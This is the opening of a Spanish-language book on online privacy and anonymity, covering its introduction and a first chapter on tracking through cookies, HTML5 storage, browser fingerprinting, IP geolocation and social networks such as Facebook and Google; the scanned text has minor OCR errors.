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Introduction 


El derecho a la privacidad y el anonimato son temas que hoy en dia despiertan el interes tanto 
de empresas como de particulares y no es para menos, ya que en los liltimos anos se han dado a 
conocer detalles tan delicados como los documentos filtrados por Edward Snowden y las actividades 
desempenadas por organizaciones como la NSA o la CIA. Se trata de cuestiones que ponen en 
manifiesto lo que muchos ya saben cuando navegan por Internet: Tu actividad en la red puede estar 
siendo vigilada. 

Muchas de estas actividades de vigilancia y monitoreo son llevadas a cabo por entidades 
gubemamentales, cuya finalidad es la de intentar detectar amenazas terroristas v actuar en 
consecuencia para minimizar su impacto, o al menos ese es el principal argumento que exponen 
algunos gobiemos como el de EEUU para justificar una supuesta necesidad de implementar sistemas 
de vigilancia a los ciudadanos. Evidentemente son muchas las personas que valoran su privacidad y 
no desean sentirse vigilados constantemente y precisamente por ese motivo, han surgido herramientas 
que ayudan a los usuarios a preservar su anonimato y privacidad en la red. Por otro lado, dichas 
soluciones no solamente proponen una via altemativa a los sistemas de monitoreo utilizados por los 
gobiemos, sino tambien a los sistemas de tracking que son empleados principalmente por empresas 
de marketing para perfilar usuarios y ofrecer productos a medida. 

Estos sistemas tambien suponen una amenaza para la privacidad de los usuarios, ya que se encargan 
de recolectar informacion sobre los sitios web visitados y consiguen determinar ciertas caracteristicas 
personales que cualquier usuario desearia mantener en privado, ya que evidentemente hacen parte 
de su vida personal. Finalmente, el caso donde este tipo de soluciones adquieren mayor notoriedad e 
importancia, es en paises donde el acceso a Internet tiene fuertes restricciones o paises en los cuales 
la ciudadanla no tiene la suficiente libertad para informar al mundo sobre los abusos que sufren por 
parte de sus respectivos gobiemos. 

Aunque parezca increible, hoy en dia existen paises cuya politica es completamente hermetica 
y no solamente mantienen un estricto control de la opinion publica, sino que ademas no admite 
recomendaciones ni la intervention por parte de ningun pais u organization extranjera. Un entomo 
asi es propicio para la supresion de cualquier tipo de derecho o libertad y es justamente lo que 
ocurre en paises como Corea del Norte o China, en los que se aplican condenas desproporcionadas 
por el simple hecho de tener una opinion que no se encuentre alineada con los criterios del regimen. 
Probablemente sea uno de los mejores usos que se le pueden dar a este tipo de herramientas, ya que 
ayudan a las personas que se encuentran en situaciones extremas y que no tienen forma de denunciar 
los abusos cometidos por las autoridades del pais en el que residen. Por otro lado, los beneficios que 
aportan las plataformas de anonimato mas populares, tambien suelen ser utilizadas por grupos de 
activistas que realizan protestas en la red e intentan reivindicar sus derechos. 
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Uno de los grupos activistas mas conocidos en los ultimos anos es el colectivo “Anonymous’, a 
los cuales se les ha atribuido varios ataques a sitios en Internet y filtracion de informacion sensible 
de empresas y organismos gubemamentales. Si bien es cierto que dichas actividades han sido 
ampliamente cuestionadas, tambien han realizado numerosos ataques a sitios en la web profunda 
que se encargaban de la distribution de pomografia infantil y narcotrafico, sin embargo son hechos 
que han tenido menor relevancia para los medios de comunicacion tradicionales por razones obvias. 
Aunque se trata de herramientas que han sido desarrolladas con una finalidad completamente 
altruista y que pretenden ayudar a las personas para que hagan valer sus derechos fundamentales, 
tambien han sido utilizadas por ciberdelincuentes que encuentran en ellas una solution perfecta para 
pasar desapercibidos y cometer crimenes de forma anonima. 

El uso de plataformas anonimas se ha convertido en los ultimos anos en la forma predilecta de 
comunicacion por parte de mafias, miembros del crimen organizado, pedofilos, narcotraficantes, entre 
otros. Por tal motivo, organizaciones como la Interpol o la Europol centran gran parte de sus esfuerzos 
en intentar desenmascarar a estos delincuentes y dar con su ubicacion real, independientemente del 
pais en el que se encuentren. 

Estamos en una epoca en la que es importante mantener unos niveles adecuados de privacidad y en 
ultima instancia de anonimato, no solamente porque los gobiemos tengan sistemas de vigilancia, 
sino porque tambien actualmente la informacion personal es tratada como un producto mas y hay 
empresas que estan dispuestas a pagar por esa informacion. El principal objetivo de este documento 
es que tengas una idea clara sobre el funcionamiento de las principales soluciones en materia de 
anonimato, que adquieras el nivel tecnico necesario para poder configurarlas y navegar por la web 
profunda de forma segura. 

Ademas, tambien es menester de este libro explicar al lector que no existe tal cosa como el 
“anonimato perfecto”, existen herramientas que dificultan ciertos ataques y ayudan a asegurar el 
canal de comunicacion entre un emisor y un receptor, pero el usuario debe saber como utilizar 
adecuadamente dichas herramientas y emplear su sentido comun, y aun asi es posible que su 
anonimato no sea tan robusto como espera debido a vulnerabilidades en el software u otros factores 
no controlados. Por este y otros motivos, en este libro se hablara de las plataformas de anonimato 
mas robustas y seguras que existen actualmente, ya que conocer y utilizar conjuntamente estas 
soluciones mejorara notablemente la privacidad de cualquier usuario en Internet. 


Saludos y Happy Hack!! 
Adastra. (@jdaanial) 
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Capitulo I 

Alternativas para la navegacion anonima 
y privacidad en Internet 


En este primer capitulo se trataran temas basicos relacionados con la privacidad y el anonimato, 
haciendo un enfasis especial en la importancia que tiene la privacidad de cualquier persona que 
navega por Internet y que utiliza diferentes tipos de servicios en linea. Por otro lado, se explicara 
la importancia que tiene el conocer y saber utilizar las principales herramientas y complementos 
para navegadores web que ayudan a una navegacion segura y privada en Internet. Ademas, 
tambien se hablara sobre buenos habitos y normas basicas que se deben tener en cuenta con el fin 
de disfirutar de privacidad y anonimato cuando se navega por Internet. Si el lector considera que 
tiene los conocimientos suficientes sobre dichos temas, se recomienda saltar al capitulo dos de este 
documento, en el que se comenzara a detallar desde una perspectiva tecnica el funcionamiento 
y configuration de las redes anonimas mas populares y robustas que se encuentran disponibles 
publicamente. 


1.1 ^Por que debo preocuparme por mi privacidad 
en Internet? No tengo nada que ocultar 

Esta es una buena forma de comenzar este libro, ya que seguramente es una de las frases mas 
frecuentes cuando se habla de privacidad y anonimato. La privacidad es uno de los derechos 
fundamentales incluidos en la declaration universal de los derechos humanos y no solamente es 
vital que los usuarios sean conscientes de su importancia, sino que tambien son fibres de exigirla 
a los administradores de aquellos servicios que gestionan informacion confidencial. Dicho esto, 
la pregunta “^Por que debo preocuparme por mi privacidad en Internet?” tiene facil respuesta: 
Porque los datos personales de un usuario pueden ser utilizados por terceros de forma arbitraria e 
irresponsable, con las consecuencias que aquello implica para el propietario de la informacion. 

Ahora bien, otro argumento que es bastante utilizado hoy en dia es el de “No tengo nada que ocultar”, 
“No tengo nada que le pueda interesarle a un atacante” o “No soy un delincuente ni un terrorista, 
no me preocupa la privacidad ni mucho menos ser anonimo en Internet”. Son afirmaciones que 
desafortunadamente se han ido arraigando en la mentalidad de muchos usuarios y debido a esto, no 
solamente se sienten seguros compartiendo informacion sensible con cualquiera en redes sociales 
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o blogs, sino que ademas lo hacen sin pensar detenidamente en el impacto que supone publicar 
informacion personal propia o de otras personas de su entomo. Si el lector opina que “no tiene nada 
que ocultar”, deberia pensarlo dos veces y plantearse las siguientes cuestiones: 

- ^Compartiria informacion sobre la ubicacion de su residencia con un extrano? 

- ^Compartiria fotos o imagenes suyas o de sus familiares mas cercanos con desconocidos? 

- ^Compartiria informacion relacionada con su trabajo, sus asuntos financieros, legales o el 
estado de su salud con personas fuera de su circulo de confianza? 

- ^Compartiria informacion sobre su rutina diaria o la de sus hijos con un desconocido? 

- ^Pennitiria que alguien con acceso a dicha informacion la compartiera con cualquiera? 

Ahora es el momenta de preguntarse nuevamente: ^Tiene algo que ocultar? 

Otra idea que se ha instaurado en la mentalidad de muchos usuarios en Internet es que aquellas 
personas que buscan anonimato, son personas que pretenden esconder algun tipo de actividad 
delictiva, pero lo cierto es que la mayoria se dedican a crear herramientas, documentar e informar 
para proteger la informacion de los usuarios, se preocupan por la integridad de la informacion y les 
alarma la vigilancia constante por parte de instituciones de caracter publico y pri vado sobre cualquiera 
que tenga su ordenador conectado a Internet. El equipo que se encuentra detras de proyectos como 
TOR o I2P son un claro ejemplo, se trata de Hackers con un alto nivel de conocimientos que enfocan 
sus esluerzos en crear soluciones para ayudar al usuario a algo que desde luego deberia convertirse 
en un habito en aquellas personas que utilizan servicios en linea diariamente. 


1.1.1 Seguimiento, vigilancia y herramientas para proteger la 
privacidad de los usuarios 

Cuando se utilizan servicios en Internet de cualquier tipo, es inevitable dejar trazas de forma 
activa o pasiva. Las tecnicas de “tracking” son utilizadas por empresas y en algunas ocasiones, 
por organizaciones relacionadas con el orden publico. Un ejemplo bastante comun sobre de dichas 
trazas, corresponde al uso inadecuado de redes sociales como Facebook o Twitter en las que se 
comparten detalles personales como gustos, aficiones, ideologia, religion o incluso fotografias 
y documentos con informacion sensible. Dicha informacion es recopilada sin que el usuario sea 
realmente consciente de que puede ser utilizada para generar perfiles muy concretos sobre sus 
habitos en Internet, las relaciones que tiene con otras personas e incluso sobre su rutina diaria. 

Por otro lado, cuando un usuario utiliza un servicio en linea desde un navegador web con cualquier 
tipo de dispositivo, los datos enviados desde el usuario hacia el servicio no viajan en una conexion 
directa, sino que pasan por medio de varios ordenadores intermedios que componen el entomo de 
red. Si dicha informacion viaja en texto claro, el usuario debe confiar en que su informacion no esta 
siendo visualizada, almacenada y/o alterada por un tercero. Se trata de una situacion en la que el 
usuario se encuentra expuesto a multiples amenazas contra su privacidad e incluso contra su propia 
seguridad, ya que no sabe realmente si hay alguien vigilandole y si ese es el caso, sabe mucho 
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menos sobre sus motivaciones. Evidentemente se trata de una situacion que tiene unas implicaciones 
tremendas, especialmente hoy en dia en que usar servicios en linea de todo tipo se ha convertido 
en parte de la rutina diaria de millones de personas.Teniendo en cuenta lo explicado anteriormente, 
es importante conocer y saber utilizar algunas de las herramientas basicas de protection contra las 
principales amenazas que afectan la privacidad y la integridad de la informacion intercambiada entre 
usuario y servicio. 

A continuacion se explican algunas de las tecnicas de tracking utilizadas para perfilar los habitos, 
gustos y cualquier otro detalle personal de un usuario que utiliza servicios tales como redes sociales, 
aplicaciones de mensajeria, tiendas en linea, etc. 

1.1.1.1 Politicas de Privacidad 

Cuando un servicio en linea almacena y gestiona datos confidenciales de cualquier persona, debe 
indicar a sus usuarios un acuerdo en el que se detalla como sera utilizada dicha informacion. Dicho 
acuerdo tambien recibe el nombre de “politica de privacidad” y en algunos casos, se solicita a todos 
los clientes que acepten el acuerdo con el fin de poder utilizar plenamente todas las funcionalidades 
del servicio. 

La realidad es que la mayoria de los usuarios no leen detenidamente las politicas de privacidad de 
los servicios que utilizan y simplemente aceptan de buen agrado todas las condiciones impuestas 
por el proveedor con el fin de poder acceder al sitio web tranquilamente. Se trata de un mal habito 
que puede afectar la privacidad de un usuario y debe evitarse a toda costa. Del mismo modo que 
cualquiera dedica unos minutos a leer un contrato en papel de cualquier tipo, tambien es una buena 
practica leer y tener absolutamente claros los terminos del acuerdo en materia de privacidad. 


1.1.1.2 Cookies 

Las cookies son pequenos ficheros de texto que guardan informacion enviada por el servicio web 
en el navegador del usuario. Se trata de un mecanismo que ha sido utilizado desde los inicios de 
Internet e intenta dar respuesta a uno de los problemas mas conocidos del protocolo HTTP: La 
incapacidad de almacenar informacion entre diferentes peticiones y respuestas. 

HTTP es un protocolo sin estado ya que cada petition enviada por un cliente es completamente 
independiente de otras, en el protocolo no se implementa de forma nativa ningun mecanismo para 
conservar la informacion resultante de la interaction entre un cliente y un servicio. 

Las cookies son elementos vitales en el funcionamiento de muchas aplicaciones web, ya que 
permiten identificar las preferencias de cada usuario a la hora de interactuar con un servicio. Las 
cookies han jugado un papel muy importante en la evolution de las aplicaciones web y actualmente, 
practicamente todas las aplicaciones web en Internet hacen uso de ellas. Las cookies se pueden 
categorizar de acuerdo a su funcion o utilidad y en cada caso, el riesgo para la privacidad puede ser 
variable. 

A continuacion se explican algunas de dichas categorias en la siguiente tabla. 
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Cookies 

de sesion 

Se trata de cookies que almacenan informacion sobre un usuario mientras 
que se encuentra navegando por un sitio web. Suelen tener una duracion 
corta, tipicamente hasta que el usuario cierra su navegador o caducan. Son 
utiles para identificar a un usuario y almacenar informacion relacionada 
con sus preferencias. Dicha informacion es utilizada para ofrecer 
contenidos personalizados que se ajusten a lo exigido por el cliente. 

Cookies 

funcionales 

Sonaquellascookiesquepermitendotaralaaplicacionwebdecomportamientos 
personalizados dependiendo de su valor. Algunos ejemplos de este tipo de 
cookies son aquellas que permiten el procesamiento de una operacion en la 
aplicacion web o el acceso afuncionalidades concretas. Evidentemente este tipo 
de cookies son definidas y utilizadas por los desarrolladores del sitio web con el 
fin de cubrir ciertos requisites funcionales o tecnicos exigidos en la aplicacion. 

Cookies 

de terceros 

Son cookies que se crean por un dominio extemo al que el 
usuario se encuentra visitando y en ocasiones son empleadas 
para hacer un seguimiento de la actividad del usuario. 

Cookies 

de personalizacion 

Aunque son similares a las cookies funcionales, las cookies de 
personalizacion se encargan de establecer valores de caracter general que 
tipicamente afectan a la presentation del sitio web. Algunos ejemplos 
de este tipo de cookies son aquellas que establecen el idioma en el que se 
deben ensenar los contenidos del sitio web o el tipo de navegador utilizado 
por el cliente con el fin de servir los contenidos de forma adecuada. 

Cookies 

de analisis 

Se trata de valores que le permiten a una aplicacion web analizar el 
comportamiento de los usuarios y generar patrones. Este tipo de cookies 
pueden contener, entre otras cosas, la hora en la que el usuario entra y sale del 
sitio web, el navegador utilizado, la direccion IP reportada por el navegador, 
los enlaces mas visitados del sitio, etc. Evidentemente, se trata de cookies que 
intentan perfilar y conocer los habitos de los usuarios de la aplicacion web. 


Todas las cookies tienen una relacion directa con el dominio o sitio web que las crea, de esta 
forma, una aplicacion web no puede inspeccionar la informacion almacenada en las cookies de 
un dominio distinto al suyo, ya que evidentemente supondria una brecha de seguridad grave. No 
obstante, algunos servicios utilizan las denominadas “cookies de terceros”, las cuales son creadas en 
el navegador por un sitio web distinto al que el usuario esta visitando. 

Este tipo de cookies permiten que empresas de publicidad realicen un seguimiento sobre la actividad 
de los usuarios con el fin de recolectar informacion como la direccion de correo del usuario, lugar de 
residencia, documento de identificacion, gustos a la hora de realizar compras en Internet, etc. Dicha 
informacion es de uso personal y no deberia ser utilizada por terceros sin previo consentimiento, 
por este motivo, en un intento de salvaguardar la privacidad de los usuarios y controlar el uso 
indebido de informacion de caracter personal, se han creado leyes como la LOPD (Ley Organica de 
Proteccion de Datos) que entre muchas otras cosas, obligan a los sitios en Internet a notificar a sus 
usuarios que se almacenaran cookies de terceros en su navegador y en consecuencia, se solicita su 
consentimiento. No obstante, son muchos los usuarios que despues de ver la advertencia que indica 
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el uso de dichas cookies, simplemente deciden aceptar y continuar con la navegacion normalmente, 
sin ser plenamente conscientes del tipo de information que se esta almacenando en su navegador. 

Un ejemplo tipico del uso de cookies de terceros, se puede ver en cualquier sitio web en Internet que 
utiliza algun servicio de Google o por ejemplo, si el sitio web permite compartir contenidos a traves 
de redes sociales como Facebook. Normalmente, cuando un sitio web en Internet utiliza cookies 
de terceros, las funcionalidades o contenidos principales del sitio en cuestion no se ven demasiado 
mermadas cuando el usuario no acepta dichas cookies y en la mayoria de navegadores modemos, 
como es el caso de Firefox, existen opciones de configuration que le indican al navegador que por 
defecto debe rechazarlas y mantener la navegacion privada; tal como se vera mas adelante en este 
capitulo. 

1.1.1.3 Elementos persistentes de HTML5 

La ultima especificacion de HTML a la fecha de escribir este documento se encuentra en la version 
cinco y aporta unas funcionalidades muy interesantes en el lado del cliente. El mecanismo de 
almacenamiento de HTML5, tambien conocido como “ Client-Site storage ” es similar a las cookies 
tradicionales, pero es mucho mas completo ya que el tamano de los datos que se pueden guardar 
puede llegar hasta los 10MB, mientras que en el caso de las cookies tradicionales su tamano maximo 
es de 4KB. Por otro lado, a diferencia de las cookies, los datos almacenados no caducan ni tampoco se 
envian en cada petition entre cliente y servidor, algo que si ocurre con las cookies. El mecanismo de 
almacenamiento local de HTML5 es una mejora considerable a la hora de guardar datos en el cliente 
sin depender de las cookies tradicionales y cuenta con una API en Javascript que permite acceder y 
manipular sus elementos almacenados en el cliente. Actualmente, navegadores con conocidos como 
Firefox, Google Chrome/Chromium y Opera tienen un soporte completo a dicha especificacion y los 
servicios y aplicaciones web ya aprovechan plenamente sus funcionalidades. 

Por otro lado, existen tres modelos de almacenamiento en el lado del cliente segun la especificacion 
de HTML5 que son: Local, Session y Global. La diferencia entre los tres modelos radica en que en 
el almacenamiento local, los datos se guardan de forma persistente en el cliente y no se eliminan 
automaticamente, es decir, que es necesario limpiar dicho espacio de almacenamiento de forma 
explicita. Por otro lado, el tipo Session se limpia automaticamente cuando el usuario cierra el 
navegador o la pestana del sitio web. Finalmente, el almacenamiento Global es un espacio de memoria 
en el navegador en el que los sitios web pueden almacenar datos persistentes que no necesitan ser 
enviados posteriormente al servidor y aunque en los primeros borradores de la especificacion se 
mencionaba que los valores almacenados en dicho espacio podian ser publicos a cualquier dominio, 
los desarrolladores de los navegadores web mas populares no adoptaron esa recomendacion por 
cuestiones de seguridad y los datos almacenados en dicha zona, ahora se asocian automaticamente 
con el dominio en cuestion. 

En las versiones mas recientes de navegadores como Chromium o Firefox, el objeto “ globalStorage" 
deja de ser soportado y en su lugar se utiliza el objeto “localStorage ”, con lo cual los tipos de 
almacenamiento Local y Global se fusionan en uno solo por medio del uso del objeto “ localStorage ” 
de la API en Javascript de HTML5. 
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Despues de explicar el funcionamiento del almacenamiento en el lado del cliente de HTML5, 
rapidamente se puede apreciar que los servicios web en Internet que soportan estas caracteristicas, 
tambien pueden aplicar algunas de las tecnicas de seguimiento y vigilancia que se pueden aplicar 
con las cookies tradicionales y lo que es peor, dado que no tienen una fecha de caducidad como 
ocurre con las cookies, son elementos que pueden quedarse de forma indefinida en el navegador 
de cliente y que le permitan a un servicio web o a terceros, acceder a informacion sensible sin 
consentimiento previo. 


1.1.1.4 Identification del navegador 

Eliminar las cookies del navegador o rechazar su almacenamiento son buenas practicas para evitar 
que un sitio web malicioso comparta informacion personal o identificativa con terceros. Las cookies 
representan el mecanismo mas utilizado para el rastreo de usuarios, pero evidentemente no es el 
unico y tratar de identificar a un usuario por medio de las caracteristicas de su navegador es otro de 
los metodos mas utilizados. Cuando un cliente realiza una conexion con un sitio web en Internet, 
envia informacion del navegador que utiliza al servidor por medio de las cabeceras que viajan en las 
peticiones HTTP o por medio de la ejecucion de scripts en Javascript que se encargan de recolectar 
informacion sobre el navegador y enviarla al sitio web en cuestion. La eficacia de esta tecnica 
depende de la cantidad de informacion que se pueda recuperar del navegador del cliente, ya que 
evidentemente, existen miles de usuarios que utilizan una version concreta de un navegador, pero 
cuando se combina con otros datos como el lenguaje, resolution de pantalla, direction IP del cliente, 
fuentes instaladas y otros elementos que se pueden recuperar utilizando Javascript tales como una 
latitud y longitud aproximada, la probabilidad de identificar y perfilar un usuario puede superar el 
85% de efectividad, evidentemente dicho valor puede variar dependiendo de la cantidad de datos 
que se puedan recuperar y combinar. Un patron identificativo de estas caracteristicas es diflcil de 
evitar, pero existen herramientas que impiden el envlo de la informacion sensible del navegador a 
cualquier sitio web en Internet. Sobre dichas herramientas se hablara en mayor detalle a lo largo de 
este capltulo. 

1.1.1.5 Direction IP y geolocalization 

Cuando un usuario navega por Internet desde casa, la direction IP que utiliza se asigna de forma 
automatica por el proveedor del servicio (ISP) que facilita la conexion a Internet. Dicha direction 
puede ser utilizada por un servicio en linea para identificar su ciudad de residencia y combinado 
con otras trazas, es posible obtener informacion identificativa del usuario. Tal como se vera en las 
proximas secciones y capitulos de este documento, una red anonima como Tor supone una solution 
que aporta unos buenos niveles de anonimato y privacidad ocultando la direction IP utilizada por 
el usuario. Las direcciones IP en Internet se encuentran ubicadas en bases de datos distribuidas 
que utilizan el protocolo WHOIS, el cual p*ermite realizar consultas y obtener informacion sobre el 
propietario de un dominio o direction IP en Internet. Tradicionalmente estas consultas se realizan 
desde cualquier interprete de comandos en sistemas basados en Unix, sin embargo existen multitud 
de servicios en linea que se encargan de consultar estos registros. La informacion que se puede 
obtener de un usuario a partir de una direction IP puede identificarle y suele ser el punto de inicio 
para determinar la ubicacion de aquellas personas que comenten delitos en Internet. 
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1.1.1.6 Registros de actividad 

Algunos servicios en linea intentan mantener registros sobre la actividad de sus usuarios registrados 
con el fin de generar perfiles y posteriormente incluir publicidad dirigida. Los registros de actividad 
que puede almacenar un servicio son muy diversos y del mismo modo que ocurre a la hora de 
perfilar un usuario por medio de su navegador, cuanta mas information mas preciso sera el rastreo. 
Muchos de estos sitios contienen una polltica de privacidad que le explica a los usuarios cuando se 
registran la forma en la que seran tratados sus datos y aunque realmente no hay ninguna garantia 
de que el proveedor del servicio respete la privacidad de sus usuarios, existen recursos legales que 
los usuarios tienen a su disposition en el caso de que quieran exigir responsabilidades sobre el 
uso indebido de su information. Por este motivo, es de suprema importancia leer detenidamente 
los terminos del servicio y la politica de privacidad declarada por el proveedor, ya que en algunas 
ocasiones, dichos acuerdos encierran clausulas que pueden afectarnegativamente la confidencialidad 
de la information. 

Los tipos de registros que son examinados con mayor detalle y cuidado por el proveedor de un 
servicio para perfilar a sus usuarios se listan a continuation. 

- Horas del dia en las que el usuario suele conectarse: Dependiendo de la franja horaria es 
posible inferir varias cosas, como por ejemplo la ubicacion del usuario dependiendo de sus 
horas de mayor actividad, interaction con otros miembros de la plataforma (en el caso de que el 
servicio en cuestion lo permita), etc. Ademas, en el caso de sitios de opinion o foros, tambien es 
posible generar un analisis sobre las horas en las que un usuario concreto tiene mayor interaction. 

- Visitas realizadas a cada una de las paginas del sitio: En este caso, el proveedor del servicio 
no solamente puede registrar la navegacion del usuario, sino que ademas puede recolectar 
y analizar dicha information de tal forma que le permita generar perfiles con gustos, 
preferencias y como no, publicidad a medida partiendo de dichos perfiles. 

- Registro de dispositivos y direcciones IP: Algunos servicios suelen registrar las direcciones 
IP y los dispositivos que han sido utilizados para la conexion. Dicha information puede ser 
util para conocer la ubicacion del usuario y en algunos casos, su rutina diaria. Por ejemplo, 
son muchas las personas que en las primeras horas de su jomada laboral suelen acceder a 
foros o sitios web de noticias, mientras que otras personas lo hacen solamente desde casa, 
en cualquiera de los casos el proveedor puede inferir que el usuario se encuentra en su lugar 
de trabajo o en su residencia simplemente comparando las horas de conexion, dispositivos 
y direcciones IP utilizadas. Se trata de un ejemplo bastante sencillo, pero que demuestra lo 
mucho que puede saber un servicio en linea de sus usuarios registrados. 

1.1.1.7 Redes sociales 

Las redes sociales como Facebook, Tuenti o Instagram, pueden suponer un serio riesgo para la 
privacidad de los usuarios, ya que casi todos estos servicios en linea, que aparentemente son de uso 
gratuito, se apropian de la information suministrada por sus usuarios y la comparten con terceros 
dependiendo de sus intereses particulares. En el caso concreto de Facebook, existen varias opciones 
que permiten especificar la information que debe hacerse publica, la information que solamente 
sera visible a la lista completa de contactos o a una lista personalizada, sin embargo es tanta la 
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informacion que Facebook recopila sobre sus usuarios y tantas las veces que han cambiado su 
politica de privacidad que es dificil tener plena confianza en que la informacion personal sea trata 
de forma adecuada. Para que el lector sea consciente del riesgo que corre su informacion personal 
en servicios como el mencionado anteriormente, se explican algunas de las caracteristicas mas 
alarmantes y que atentan contra la privacidad de los usuarios de Facebook. En este caso concreto, 
se habla de Facebook ya que es la red social mas popular y utilizada en todo el mundo a la fecha de 
redactar este documento, ademas de que muchas otras redes que se encuentran por el mismo camino 
de expansion, siguen una filosofra muy similar cuando de respetar la informacion personal de los 
usuarios se trata. 

Facebook mantiene la informacion suministrada por el usuario, aunque su perfil sea eliminado 

Informacion personal como fotos, comentarios, videos y demas recursos que se vinculan a una 
cuenta de Facebook son propiedad de la compania, aunque el usuario voluntariamente quiera cerrar 
su cuenta y eliminar su perfil de la mencionada red social. Facebook guarda un registro de toda la 
informacion que el usuario ha publicado en la plataforma y advierte de diclio hecho en su politica 
de privacidad y en los terminos de uso del servicio. Para que las publicaciones hechas con una 
cuenta dejen de estar disponibles, es necesario eliminar manualmente cada una de las fotos, videos, 
comentarios y aplicaciones que ha utilizado. No obstante, aunque aun sea posible acceder a algunos 
de estos datos sobre una cuenta eliminada, el propietario de dicha informacion es un usuario de 
Facebook “anonimo”, lo que quiere decir que la persona que ha publicado el contenido en cuestion 
ya no se encuentra registrada en la plataforma, pero sus datos siguen estando disponibles. 

Seguimiento intrusivo 

Facebook utiliza varias tecnicas de seguimiento para perfilar gustos y la actividad en Internet de 
cada uno de sus usuarios. El principal objetivo de dicho seguimiento es el de ofrecer productos 
y/o servicios que esten acordes con las paginas visitadas por el usuario. Tal como se ha explicado 
en parrafos anteriores, una de las operaciones de seguimiento y vigilancia mas comun se basa 
en el uso de las cookies de terceros y en este punto, las cookies de esta red social se encuentran 
diseminadas por miles de sitios web en Internet. Puede haber muchas formas para que un sitio 
web incluya cookies de Facebook, sin embargo una de las mas comunes es mediante los tipicos 
botones para compartir contenidos. Facebook utiliza estos rastros de navegacion para saber con 
exactitud las paginas visitadas, o al menos, aquellas que estan a su alcance por medio de las cookies. 
Con todo esto, es capaz de crear anuncios publicitarios a medida, explotando la informacion de las 
cookiesalmacenadas en el navegador del usuario. 

Niveles acceso de otros usuarios al perfil e informacion personal 

Una de las principales caracteristicas que tiene Facebook, es que permite establecer diferentes niveles 
acceso a la informacion que se publica en las diferentes secciones de la red. De esta forma, es posible 
indicar que unicamente un grupo reducido de personas podran acceder a los contenidos publicados, 
tales como fotos, videos, estados o informacion personal. No obstante, tambien es posible indicar que 
toda esa informacion sea publicada de manera abierta sin ningun tipo de restriccion y de esta forma, 
no solamente los contactos de dicha cuenta podran acceder a los contenidos, tambien cualquier 
usuario con una cuenta o sin ella. Como el lector comprendera, hay una serie de implicaciones 
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que hay que tener en cuenta antes de establecer cualquier contenido como publico y la primera 
de ellas es evidente, cualquier usuario dentro o fuera de la red social tendra acceso al contenido. 
Otro riesgo contra la privacidad cuando se establecen este tipo de contenidos, viene de la mano de 
buscadores como Google o el mismo Facebook, ya que al no existir ningun control de acceso sobre 
dicho contenido, se puede indexar por cualquier buscador y por si fuera poco, aunque la cuenta que 
ha publicado el contenido sea eliminada de Facebook, es posible que cualquier persona en Internet 
pueda seguir utilizandolo en un sitio web extemo a Facebook, con lo cual, es imposible controlar 
su alcance. 

Ahora bien, esta caracteristica por si misma no es un fallo de Facebook que afecta la privacidad de sus 
usuarios, en practicamente todas las versiones que ha tenido la politica de privacidad de Facebook se 
ha advertido, de forma clara y concisa, el impacto que puede tener compartir contenidos de forma 
publica. Es importante que los usuarios de este tipo de redes entiendan el valor de su informacion 
personal y que sean capaces de medir las consecuencias que implica crear un contenido de estas 
caracteristicas utilizando el sentido comun. Por ejemplo, no es lo mismo compartir un comentario 
libre sobre cualquier tema que compartir las fotos y videos de unas vacaciones o informacion basica 
del perfil como su lugar de residencia, correo electronico, fotos personales, etc. Evidentemente el 
impacto y las consecuencias de ambos escenarios son completamente distintos. 

Informacion que no se puede ocultar 

Existen ciertos datos del perfil de cualquier cuenta que son publicos, como por ejemplo el nombre, 
foto de perfil, sexo, las redes y paginas a las que el usuario le ha dado un “Me gusta”, etc. Dicha 
informacion en algunos casos es suficiente para identificar inequivocamente a un usuario y junto 
con otras fuentes de informacion abierta, perfilar sus gustos o incluso su rutina diaria. Esto quiere 
decir que el mero hecho de tener una cuenta en Facebook y registrar datos personales, deja abierta 
la posibilidad de que alguien mas en Internet pueda realizar ataques pasivos o activos contra dicho 
usuario, ya sea simplemente recolectando y procesando informacion o ejecutando ataques mucho 
mas elaborados con tecnicas de ingeniera social. No obstante, aunque a la hora de crear una cuenta 
se solicita informacion basica del perfil, el usuario tiene la libertad de ingresarla en otro momento 
o si lo prefiere, no especificar dichos datos durante el tiempo que permanezca activa su cuenta. Eso 
si, la red social detecta que falta informacion basica por rellenar y constantemente avisa al usuario 
que su perfil se encuentra incompleto y que deberia suministrar los datos faltantes para que las 
busquedas sean mas precisas (y para que Facebook cuente con esa informacion en sus servidores, 
evidentemente). Ademas, en el caso de no suministrar informacion personal como el nivel de 
estudios o el lugar de residencia, Facebook es capaz de realizar un conteo de aquellos contactos que 
si han suministrado dichos datos y los presenta a modo de “sugerencias” dependiendo del numero 
ocurrencias dadas. 

Por ejemplo, en el caso de no especificar el lugar de residencia, Facebook le indica al usuario cuales 
son las tres ciudades mas recurrentes entre sus contactos y lo mismo sucede con otros datos basicos 
como el lugar donde ha realizado sus estudios o el sitio en el que trabaja. Como se puede ver, 
Facebook es una red social muy considerada que es capaz de recordarle al usuario el lugar en el 
que “posiblemente” se encuentra su residencia, la universidad en la que ha cursado sus estudios o 
la empresa en la que trabaja, todo esto en el caso de que el olvidadizo usuario lo tenga que recordar 
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constantemente visitando su pagina personal. Seguramente la pellcula “Memento” tambien sera una 
sugerencia valida para que el usuario le de un “Me gusta”. 

1.1.1.8 Servicios de Google 

Google cuenta con varios servicios que son utilizados por millones de usuarios diariamente, sin 
embargo, dichos servicios monitorizan y registran cada una de las actividades llevadas a cabo por sus 
usuarios, de este forma pueden generar perfiles muy concretos a partir de navegacion y las consultas 
realizadas. Google no solamente es uno de los buscadores mas potentes que existen actualmente, 
tambien es una empresa que gana muchlsimo dinero en campanas publicitarias y estrategias de 
marketing, por ese motivo no es de extranar que enfoquen sus esfuerzos en crear herramientas y 
servicios que sean faciles de utilizar para cualquier usuario y ademas, que sean capaces de recolectar 
informacion e identificar a cualquiera en Internet. 

Del mismo modo que ocurre con redes sociales como Facebook, aunque un usuario no utilice dichos 
servicios, existen una gran cantidad de sitios en Internet que utilizan cookies de Google y tal como 
se ha visto anteriormente, las cookies de terceros son uno de los mecanismos mas eficientes para 
la identification, perfilado y seguimiento. Los mecanismos de tracking de Google no se limitan 
unicamente a sus servicios gratuitos en Internet, tambien cubre un porcentaje considerablemente 
alto de servicios en llnea que son utilizados a diario por millones de personas, tales como blogs, 
portales de noticias, diversos comercios en Internet, entre otros. No obstante, cualquier usuario con 
una cuenta de Google puede ver exactamente que informacion ha almacenado Google sobre sus 
busquedas, dispositivos utilizados para acceder a sus servicios, entre otras cosas. A continuation 
se describen algunas de las herramientas que Google pone a disposition de todos los usuarios para 
gestionar la informacion recolectada. 

Registro de busquedas 

Es por todos conocido que el principal servicio que ofrece Google a sus usuarios es su buscador, 
